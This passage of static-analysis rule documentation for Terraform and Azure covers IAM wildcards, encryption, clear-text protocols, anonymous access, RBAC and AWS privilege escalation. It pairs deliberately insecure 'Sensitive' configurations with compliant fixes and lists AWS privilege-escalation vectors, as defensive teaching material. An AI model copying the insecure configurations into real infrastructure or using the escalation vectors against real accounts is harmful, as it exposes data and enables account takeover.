              "encodedPemCertificate": "[base64-encoded certificate]"
            }
          ]
        }
      }
    }
  ]
}
resource example 'Microsoft.ContainerRegistry/registries/tokens@2022-12-01' = {
  name: 'example'
  properties: {
    credentials: {
      certificates: [ // Compliant
        {
          name: 'certificate1'
          encodedPemCertificate: '[base64-encoded certificate]'
        }
      ]
    }
  }
}

See

terraform:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access and disclosure of sensitive information will occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., by only granting access to necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of data they store or process. Therefore, managing a secure access control is less prone to errors.

Sensitive Code Example

Update permission is granted for all policies using the wildcard (*) in the Resource property:

resource "aws_iam_policy" "noncompliantpolicy" {
  name        = "noncompliantpolicy"

  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Action = [
          "iam:CreatePolicyVersion"
        ]
        Effect   = "Allow"
        Resource = [
          "*" # Sensitive
        ]
      }
    ]
  })
}

Compliant Solution

Restrict update permission to the appropriate subset of policies:

resource "aws_iam_policy" "compliantpolicy" {
  name        = "compliantpolicy"

  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Action = [
          "iam:CreatePolicyVersion"
        ]
        Effect   = "Allow"
        Resource = [
          "arn:aws:iam::${data.aws_caller_identity.current.account_id}:policy/team1/*"
        ]
      }
    ]
  })
}

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

terraform:S6388

Using unencrypted cloud storages can lead to data exposure. In the case that adversaries gain physical access to the storage medium they are able to access unencrypted information.

Ask Yourself Whether

  • The service contains sensitive information that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt cloud storages that contain sensitive information.

Sensitive Code Example

For azurerm_data_lake_store:

resource "azurerm_data_lake_store" "store" {
  name             = "store"
  encryption_state = "Disabled"  # Sensitive
}

Compliant Solution

For azurerm_data_lake_store:

resource "azurerm_data_lake_store" "store" {
  name             = "store"
  encryption_state = "Enabled"
  encryption_type  = "ServiceManaged"
}

See

terraform:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

For AWS Kinesis Data Streams server-side encryption:

resource "aws_kinesis_stream" "sensitive_stream" {
    encryption_type = "NONE" # Sensitive
}

For Amazon ElastiCache:

resource "aws_elasticache_replication_group" "example" {
    replication_group_id = "example"
    replication_group_description = "example"
    transit_encryption_enabled = false  # Sensitive
}

For Amazon ECS:

resource "aws_ecs_task_definition" "ecs_task" {
  family = "service"
  container_definitions = file("task-definition.json")

  volume {
    name = "storage"
    efs_volume_configuration {
      file_system_id = aws_efs_file_system.fs.id
      transit_encryption = "DISABLED"  # Sensitive
    }
  }
}

For Amazon OpenSearch domains:

resource "aws_elasticsearch_domain" "example" {
  domain_name = "example"
  domain_endpoint_options {
    enforce_https = false # Sensitive
  }
  node_to_node_encryption {
    enabled = false # Sensitive
  }
}

For Amazon MSK communications between clients and brokers:

resource "aws_msk_cluster" "sensitive_data_cluster" {
    encryption_info {
        encryption_in_transit {
            client_broker = "TLS_PLAINTEXT" # Sensitive
            in_cluster = false # Sensitive
        }
    }
}

For AWS Load Balancer Listeners:

resource "aws_lb_listener" "front_load_balancer" {
  protocol = "HTTP" # Sensitive

  default_action {
    type = "redirect"

    redirect {
      protocol = "HTTP"
    }
  }
}

HTTP protocol is used for GCP Region Backend Services:

resource "google_compute_region_backend_service" "example" {
  name                            = "example-service"
  region                          = "us-central1"
  health_checks                   = [google_compute_region_health_check.region.id]
  connection_draining_timeout_sec = 10
  session_affinity                = "CLIENT_IP"
  load_balancing_scheme           = "EXTERNAL"
  protocol                        = "HTTP" # Sensitive
}

Compliant Solution

For AWS Kinesis Data Streams server-side encryption:

resource "aws_kinesis_stream" "compliant_stream" {
    encryption_type = "KMS"
}

For Amazon ElastiCache:

resource "aws_elasticache_replication_group" "example" {
    replication_group_id = "example"
    replication_group_description = "example"
    transit_encryption_enabled = true
}

For Amazon ECS:

resource "aws_ecs_task_definition" "ecs_task" {
  family = "service"
  container_definitions = file("task-definition.json")

  volume {
    name = "storage"
    efs_volume_configuration {
      file_system_id = aws_efs_file_system.fs.id
      transit_encryption = "ENABLED"
    }
  }
}

For Amazon OpenSearch domains:

resource "aws_elasticsearch_domain" "example" {
  domain_name = "example"
  domain_endpoint_options {
    enforce_https = true
  }
  node_to_node_encryption {
    enabled = true
  }
}

For Amazon MSK communications between clients and brokers, data in transit is encrypted by default, allowing you to omit writing the encryption_in_transit configuration. However, if you need to configure it explicitly, this configuration is compliant:

resource "aws_msk_cluster" "sensitive_data_cluster" {
    encryption_info {
        encryption_in_transit {
            client_broker = "TLS"
            in_cluster = true
        }
    }
}

For AWS Load Balancer Listeners:

resource "aws_lb_listener" "front_load_balancer" {
  protocol = "HTTP"

  default_action {
    type = "redirect"

    redirect {
      protocol = "HTTPS"
    }
  }
}

HTTPS protocol is used for GCP Region Backend Services:

resource "google_compute_region_backend_service" "example" {
  name                            = "example-service"
  region                          = "us-central1"
  health_checks                   = [google_compute_region_health_check.region.id]
  connection_draining_timeout_sec = 10
  session_affinity                = "CLIENT_IP"
  load_balancing_scheme           = "EXTERNAL"
  protocol                        = "HTTPS"
}

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

terraform:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws_db_instance and aws_rds_cluster:

resource "aws_db_instance" "example" {
  storage_encrypted = false # Sensitive, disabled by default
}

resource "aws_rds_cluster" "example" {
  storage_encrypted = false # Sensitive, disabled by default
}

Compliant Solution

For aws_db_instance and aws_rds_cluster:

resource "aws_db_instance" "example" {
  storage_encrypted = true
}

resource "aws_rds_cluster" "example" {
  storage_encrypted = true
}

See

terraform:S6302

A policy that grants all permissions may indicate an improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwriting of resources may occur and therefore result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. by only granting the necessary permissions to identities. A good practice is to start with the very minimum set of permissions and to refine the policy over time. In order to fix overly permissive policies already deployed in production, a strategy could be to review the monitored activity in order to reduce the set of permissions to those most used.

Sensitive Code Example

A customer-managed policy for AWS that grants all permissions by using the wildcard (*) in the Action property:

resource "aws_iam_policy" "example" {
  name = "noncompliantpolicy"

  policy = jsonencode({
    Version   = "2012-10-17"
    Statement = [
      {
        Action   = [
          "*" # Sensitive
        ]
        Effect   = "Allow"
        Resource = [
          aws_s3_bucket.mybucket.arn
        ]
      }
    ]
  })
}

A customer-managed policy for GCP that grants all permissions by using the actions admin role role property:

resource "google_project_iam_binding" "example" {
  project = "example"
  role    = "roles/owner" # Sensitive

  members = [
    "user:jane@example.com",
  ]
}

Compliant Solution

A customer-managed policy for AWS that grants only the required permissions:

resource "aws_iam_policy" "example" {
  name = "compliantpolicy"

  policy = jsonencode({
    Version   = "2012-10-17"
    Statement = [
      {
        Action   = [
          "s3:GetObject"
        ]
        Effect   = "Allow"
        Resource = [
          aws_s3_bucket.mybucket.arn
        ]
      }
    ]
  })
}

A customer-managed policy for GCP that grants restricted permissions by using the actions admin role role property:

resource "google_project_iam_binding" "example" {
  project = "example"
  role    = "roles/actions.Viewer"

  members = [
    "user:jane@example.com",
  ]
}

See

terraform:S6308

Amazon Elasticsearch Service (ES) is a managed service to host Elasticsearch instances.

To harden domain (cluster) data in case of unauthorized access, ES provides data-at-rest encryption if the Elasticsearch version is 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, if adversaries gain physical access to the storage medium, they cannot access the data.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt Elasticsearch domains that contain sensitive information.

Encryption and decryption are handled transparently by ES, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_elasticsearch_domain:

resource "aws_elasticsearch_domain" "elasticsearch" {
  encrypt_at_rest {
    enabled = false  # Sensitive, disabled by default
  }
}

Compliant Solution

For aws_elasticsearch_domain:

resource "aws_elasticsearch_domain" "elasticsearch" {
  encrypt_at_rest {
    enabled = true
  }
}

See

terraform:S6385

Why is this an issue?

Defining a custom role for a Subscription or a Management group that allows all actions will give them the same capabilities as the built-in Owner role. It’s recommended to limit the number of subscription owners in order to mitigate the risk of being breached by a compromised owner.

This rule raises an issue when a custom role has an assignable scope set to a Subscription or a Management Group and allows all actions (*) ¨

How to fix it

Code examples

Noncompliant code example

resource "azurerm_role_definition" "example" { # Sensitive
  name        = "example"
  scope       = data.azurerm_subscription.primary.id

  permissions {
    actions     = ["*"]
    not_actions = []
  }

  assignable_scopes = [
    data.azurerm_subscription.primary.id
  ]
}

Compliant solution

resource "azurerm_role_definition" "example" {
  name        = "example"
  scope       = data.azurerm_subscription.primary.id

  permissions {
    actions     = ["Microsoft.Compute/*"]
    not_actions = []
  }

  assignable_scopes = [
    data.azurerm_subscription.primary.id
  ]
}

Resources

Documentation

terraform:S6387

Azure RBAC roles can be assigned to users, groups, or service principals. A role assignment grants permissions on a predefined set of resources called "scope".

The widest scopes a role can be assigned to are:

  • Subscription: a role assigned with this scope grants access to all resources of this Subscription.
  • Management Group: a scope assigned with this scope grants access to all resources of all the Subscriptions in this Management Group.

In case of security incidents involving a compromised identity (user, group, or service principal), limiting its role assignment to the narrowest scope possible helps separate duties and limits what resources are at risk.

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of the resources in the scope to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split the scope into multiple role assignments with a narrower scope.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the scope of the role assignment to a Resource or Resource Group.
  • Apply the least privilege principle by assigning roles granting as few permissions as possible.

Sensitive Code Example

resource "azurerm_role_assignment" "example" {
  scope                = data.azurerm_subscription.primary.id # Sensitive
  role_definition_name = "Reader"
  principal_id         = data.azuread_user.user.object_id
}

Compliant Solution

resource "azurerm_role_assignment" "example" {
  scope                = azurerm_resource_group.example.id
  role_definition_name = "Reader"
  principal_id         = data.azuread_user.user.object_id
}

See

terraform:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PublicRead, PublicReadWrite grant respectively "read" and "read and write" privileges to everyone in the world (AllUsers group).
  • AuthenticatedRead grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, ie to grant necessary permissions only to users for their required tasks. In the context of canned ACL, set it to private (the default one) and if needed more granularity then use an appropriate S3 policy.

Sensitive Code Example

All users (ie: anyone in the world authenticated or not) have read and write permissions with the public-read-write access control:

resource "aws_s3_bucket" "mynoncompliantbucket" { # Sensitive
  bucket = "mynoncompliantbucketname"
  acl    = "public-read-write"
}

Compliant Solution

With the private access control (default), only the bucket owner has the read/write permissions on the buckets and its ACL.

resource "aws_s3_bucket" "mycompliantbucket" { # Compliant
  bucket = "mycompliantbucketname"
  acl    = "private"
}

See

terraform:S6381

Azure Resource Manager offers built-in roles that can be assigned to users, groups, or service principals. Some of these roles should be carefully assigned as they grant sensitive permissions like the ability to reset passwords for all users.

An Azure account that fails to limit the use of such roles has a higher risk of being breached by a compromised owner.

This rule raises an issue when one of the following roles is assigned:

  • Contributor (b24988ac-6180-42a0-ab88-20f7382dd24c)
  • Owner (8e3af657-a8ff-443c-a75c-2fe8c4bcb635)
  • User Access Administrator (18d7d88d-d35e-4fb5-a5c3-7773c20a72d9)

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of this extensive set of permissions to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split permissions between multiple users, but it’s not enforced. There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the assignment of Owner roles to less than 3 people or service principals.
  • Apply the least privilege principle by choosing a role with a limited set of permissions.
  • If no built-in role meets your needs, create a custom role with as few permissions as possible.

Sensitive Code Example

resource "azurerm_role_assignment" "example" {
  scope                = azurerm_resource_group.example.id
  role_definition_name = "Owner" # Sensitive
  principal_id         = data.azuread_user.example.id
}

Compliant Solution

resource "azurerm_role_assignment" "example" {
  scope                = azurerm_resource_group.example.id
  role_definition_name = "Azure Maps Data Reader"
  principal_id         = data.azuread_user.example.id
}

See

terraform:S6380

Allowing anonymous access can reduce an organization’s ability to protect itself against attacks on its Azure resources.

Security incidents may include disrupting critical functions, data theft, and additional Azure subscription costs due to resource overload.

Using authentication coupled with fine-grained authorizations helps bring defense-in-depth and bring traceability to investigators of security incidents.

Depending on the affected Azure resource, multiple authentication choices are possible: Active Directory Authentication, OpenID implementations (Google, Microsoft, etc.) or native Azure mechanisms.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • This Azure resource stores or processes sensitive data.
  • Compliance policies require access to this resource to be authenticated.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Enable authentication in this Azure resource, and disable anonymous access.

If only Basic Authentication is available, enable it.

Sensitive Code Example

For App Services and equivalent:

resource "azurerm_function_app" "example" {
  name = "example"

  auth_settings {
    enabled = false # Sensitive
  }

  auth_settings {
    enabled = true
    unauthenticated_client_action = "AllowAnonymous" # Sensitive
  }
}

For API Management:

resource "azurerm_api_management_api" "example" { # Sensitive, the openid_authentication block is missing
  name = "example-api"
}

resource "azurerm_api_management" "example" {
  sign_in {
    enabled = false # Sensitive
  }
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_sftp" "example" {
  authentication_type = "Anonymous"
}

For Storage Accounts:

resource "azurerm_storage_account" "example" {
  allow_blob_public_access = true # Sensitive
}

resource "azurerm_storage_container" "example" {
  container_access_type = "blob" # Sensitive
}

For Redis Caches:

resource "azurerm_redis_cache" "example" {
  name = "example-cache"

  redis_configuration {
    enable_authentication = false # Sensitive
  }
}

Compliant Solution

For App Services and equivalent:

resource "azurerm_function_app" "example" {
  name = "example"

  auth_settings {
    enabled = true
    unauthenticated_client_action = "RedirectToLoginPage"
  }
}

For API Management:

resource "azurerm_api_management_api" "example" {
  name = "example-api"

  openid_authentication {
    openid_provider_name = azurerm_api_management_openid_connect_provider.example.name
  }
}

resource "azurerm_api_management" "example" {
  sign_in {
    enabled = true
  }
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_sftp" "example" {
  authentication_type = "Basic"
  username            = local.creds.username
  password            = local.creds.password
}

resource "azurerm_data_factory_linked_service_odata" "example" {
  basic_authentication {
    username = local.creds.username
    password = local.creds.password
  }
}

For Storage Accounts:

resource "azurerm_storage_account" "example" {
  allow_blob_public_access = true
}

resource "azurerm_storage_container" "example" {
  container_access_type = "private"
}

For Redis Caches:

resource "azurerm_redis_cache" "example" {
  name = "example-cache"

  redis_configuration {
    enable_authentication = true
  }
}

See

terraform:S6383

Disabling Role-Based Access Control (RBAC) on Azure resources can reduce an organization’s ability to protect itself against access controls being compromised.

To be considered safe, access controls must follow the principle of least privilege and correctly segregate duties amongst users. RBAC helps enforce these practices by adapting the organization’s access control needs into explicit role-based policies: It helps keeping access controls maintainable and sustainable.

Furthermore, RBAC allows operations teams to work faster during a security incident. It helps to mitigate account theft or intrusions by quickly shutting down accesses.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be enforced through the use of Role-Based Access Control.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Enable Azure RBAC when the Azure resource supports it.
  • For Kubernetes clusters, enable Azure RBAC if Azure AD integration is supported. Otherwise, use the built-in Kubernetes RBAC.

Sensitive Code Example

For Azure Kubernetes Services:

resource "azurerm_kubernetes_cluster" "example" {
  role_based_access_control {
    enabled = false # Sensitive
  }
}

resource "azurerm_kubernetes_cluster" "example2" {
  role_based_access_control {
    enabled = true

    azure_active_directory {
      managed = true
      azure_rbac_enabled = false # Sensitive
    }
  }
}

For Key Vaults:

resource "azurerm_key_vault" "example" {
  enable_rbac_authorization = false # Sensitive
}

Compliant Solution

For Azure Kubernetes Services:

resource "azurerm_kubernetes_cluster" "example" {
  role_based_access_control {
    enabled = true
  }
}

resource "azurerm_kubernetes_cluster" "example" {
  role_based_access_control {
    enabled = true

    azure_active_directory {
      managed = true
      azure_rbac_enabled = true
    }
  }
}

For Key Vaults:

resource "azurerm_key_vault" "example" {
  enable_rbac_authorization   = true
}

See

terraform:S6382

Disabling certificate-based authentication can reduce an organization’s ability to react against attacks on its critical functions and data.

Azure offers various authentication options to access resources: Anonymous connections, Basic authentication, password-based authentication, and certificate-based authentication.

Choosing certificate-based authentication helps bring client/host trust by allowing the host to verify the client and vice versa. It cannot be forged or forwarded by a man-in-the-middle eavesdropper, and the certificate’s private key is never sent over the network so it’s harder to steal than a password.

In case of a security incident, certificates help bring investigators traceability and allow security operations teams to react faster. For example, all compromised certificates could be revoked individually, or an issuing certificate could be revoked which causes all the certificates it issued to become untrusted.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be authenticated with certificates.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable certificate-based authentication.

Sensitive Code Example

For App Service:

resource "azurerm_app_service" "example" {
  client_cert_enabled = false # Sensitive
}

For Logic App Standards and Function Apps:

resource "azurerm_function_app" "example" {
  client_cert_mode = "Optional" # Sensitive
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_web" "example" {
  authentication_type = "Basic" # Sensitive
}

For API Management:

resource "azurerm_api_management" "example" {
  sku_name = "Consumption_1"
  client_certificate_mode = "Optional" # Sensitive
}

For Linux and Windows Web Apps:

resource "azurerm_linux_web_app" "example" {
  client_cert_enabled = false # Sensitive
}
resource "azurerm_linux_web_app" "exemple2" {
  client_cert_enabled = true
  client_cert_mode = "Optional" # Sensitive
}

Compliant Solution

For App Service:

resource "azurerm_app_service" "example" {
  client_cert_enabled = true
}

For Logic App Standards and Function Apps:

resource "azurerm_function_app" "example" {
  client_cert_mode = "Required"
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_web" "example" {
  authentication_type = "ClientCertificate"
}

For API Management:

resource "azurerm_api_management" "example" {
  sku_name = "Consumption_1"
  client_certificate_mode = "Required"
}

For Linux and Windows Web Apps:

resource "azurerm_linux_web_app" "exemple" {
  client_cert_enabled = true
  client_cert_mode = "Required"
}

See

terraform:S6317

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permission to an Identity (a User, a Group or Role) are called identity-based policies. They add the ability to an identity to perform a predefined set of actions on a list of resources.

Here is an example of a policy document defining a limited set of permission that grants a user the ability to manage his own access keys.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "arn:aws:iam::245500951992:user/${aws:username}",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Privilege escalation generally happens when an identity policy gives an identity the ability to grant more privileges than the ones it already has. Here is another example of a policy document that hides a privilege escalation. It allows an identity to generate a new access key for any user from the account, including users with high privileges.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "*",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Although it looks like it grants a limited set of permissions, this policy would, in practice, give the highest privileges to the identity it’s attached to.

Privilege escalation is a serious issue as it allows a malicious user to easily escalate to a high privilege identity from a low privilege identity it took control of.

The example above is just one of many permission escalation vectors. Here is the list of vectors that the rule can detect:

Vector nameSummary

Create Policy Version

Create a new IAM policy and set it as default

Set Default Policy Version

Set a different IAM policy version as default

Create AccessKey

Create a new access key for any user

Create Login Profile

Create a login profile with a password chosen by the attacker

Update Login Profile

Update the existing password with one chosen by the attacker

Attach User Policy

Attach a permissive IAM policy like "AdministratorAccess" to a user the attacker controls

Attach Group Policy

Attach a permissive IAM policy like "AdministratorAccess" to a group containing a user the attacker controls

Attach Role Policy

Attach a permissive IAM policy like "AdministratorAccess" to a role that can be assumed by the user the attacker controls

Put User Policy

Alter the existing inline IAM policy from a user the attacker controls

Put Group Policy

Alter the existing inline IAM policy from a group containing a user that the attacker controls

Put Role Policy

Alter an existing inline IAM role policy. The rule will then be assumed by the user that the attacker controls

Add User to Group

Add a user that the attacker controls to a group that has a larger range of permissions

Update Assume Role Policy

Update a role’s "AssumeRolePolicyDocument" to allow a user the attacker controls to assume it

EC2

Create an EC2 instance that will execute with high privileges

Lambda Create and Invoke

Create a Lambda function that will execute with high privileges and invoke it

Lambda Create and Add Permission

Create a Lambda function that will execute with high privileges and grant permission to invoke it to a user or a service

Lambda triggered with an external event

Create a Lambda function that will execute with high privileges and link it to an external event

Update Lambda code

Update the code of a Lambda function executing with high privileges

CloudFormation

Create a CloudFormation stack that will execute with high privileges

Data Pipeline

Create a Pipeline that will execute with high privileges

Glue Development Endpoint

Create a Glue Development Endpoint that will execute with high privileges

Update Glue Dev Endpoint

Update the associated SSH key for the Glue endpoint

The general recommendation to protect against privilege escalation is to restrict the resources to which sensitive permissions are granted. The first example above is a good demonstration of sensitive permissions being used with a narrow scope of resources and where no privilege escalation is possible.

Noncompliant code example

This policy allows to update the code of any lambda function. Updating the code of a lambda executing with high privileges will lead to privilege escalation.

resource "aws_iam_policy" "example" {
  name = "example"
  policy =<<EOF
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "lambda:UpdateFunctionCode"
            ],
            "Resource": "*"
        }
    ]
}
EOF
}

Compliant solution

Narrow the policy to only allow to update the code of certain lambda functions.

resource "aws_iam_policy" "example" {
  name = "example"
  policy =<<EOF
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "lambda:UpdateFunctionCode"
            ],
            "Resource": "arn:aws:lambda:us-east-2:123456789012:function:my-function:1"
        }
    ]
}
EOF
}

Resources

terraform:S6319

Amazon SageMaker is a managed machine learning service in a hosted production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information that should not be stored unencrypted. In the event that adversaries physically access the storage media, they cannot decrypt encrypted data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_sagemaker_notebook_instance:

resource "aws_sagemaker_notebook_instance" "notebook" {  # Sensitive, encryption disabled by default
}

Compliant Solution

For aws_sagemaker_notebook_instance:

resource "aws_sagemaker_notebook_instance" "notebook" {
  kms_key_id = aws_kms_key.enc_key.key_id
}

See

terraform:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. In the case that adversaries gain physical access to the storage medium they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration. A volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_ebs_volume:

resource "aws_ebs_volume" "ebs_volume" {  # Sensitive as encryption is disabled by default
}
resource "aws_ebs_volume" "ebs_volume" {
  encrypted = false  # Sensitive
}

For aws_ebs_encryption_by_default:

resource "aws_ebs_encryption_by_default" "default_encryption" {
  enabled = false  # Sensitive
}

For aws_launch_configuration:

resource "aws_launch_configuration" "launch_configuration" {
  root_block_device {  # Sensitive as encryption is disabled by default
  }
  ebs_block_device {  # Sensitive as encryption is disabled by default
  }
}
resource "aws_launch_configuration" "launch_configuration" {
  root_block_device {
    encrypted = false  # Sensitive
  }
  ebs_block_device {
    encrypted = false  # Sensitive
  }
}

Compliant Solution

For aws_ebs_volume:

resource "aws_ebs_volume" "ebs_volume" {
  encrypted = true
}

For aws_ebs_encryption_by_default:

resource "aws_ebs_encryption_by_default" "default_encryption" {
  enabled = true  # Optional, default is "true"
}

For aws_launch_configuration:

resource "aws_launch_configuration" "launch_configuration" {
  root_block_device {
    encrypted = true
  }
  ebs_block_device {
    encrypted = true
  }
}

See

terraform:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant necessary permissions only to users for their required tasks. In the context of resource-based policies, list the principals that need the access and grant to them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

resource "aws_s3_bucket_policy" "mynoncompliantpolicy" {  # Sensitive
  bucket = aws_s3_bucket.mybucket.id
  policy = jsonencode({
    Id = "mynoncompliantpolicy"
    Version = "2012-10-17"
    Statement = [{
            Effect = "Allow"
            Principal = {
                AWS = "*"
            }
            Action = [
                "s3:PutObject"
            ]
            Resource: "${aws_s3_bucket.mybucket.arn}/*"
        }
    ]
  })
}

Compliant Solution

This policy allows only the authorized users:

resource "aws_s3_bucket_policy" "mycompliantpolicy" {
  bucket = aws_s3_bucket.mybucket.id
  policy = jsonencode({
    Id = "mycompliantpolicy"
    Version = "2012-10-17"
    Statement = [{
            Effect = "Allow"
            Principal = {
                AWS = [
                    "arn:aws:iam::${data.aws_caller_identity.current.account_id}:root"
                ]
            }
            Action = [
                "s3:PutObject"
            ]
            Resource = "${aws_s3_bucket.mybucket.arn}/*"
        }
    ]
  })
}

See

terraform:S6404

Granting public access to GCP resources may reduce an organization’s ability to protect itself against attacks or theft of its GCP resources.
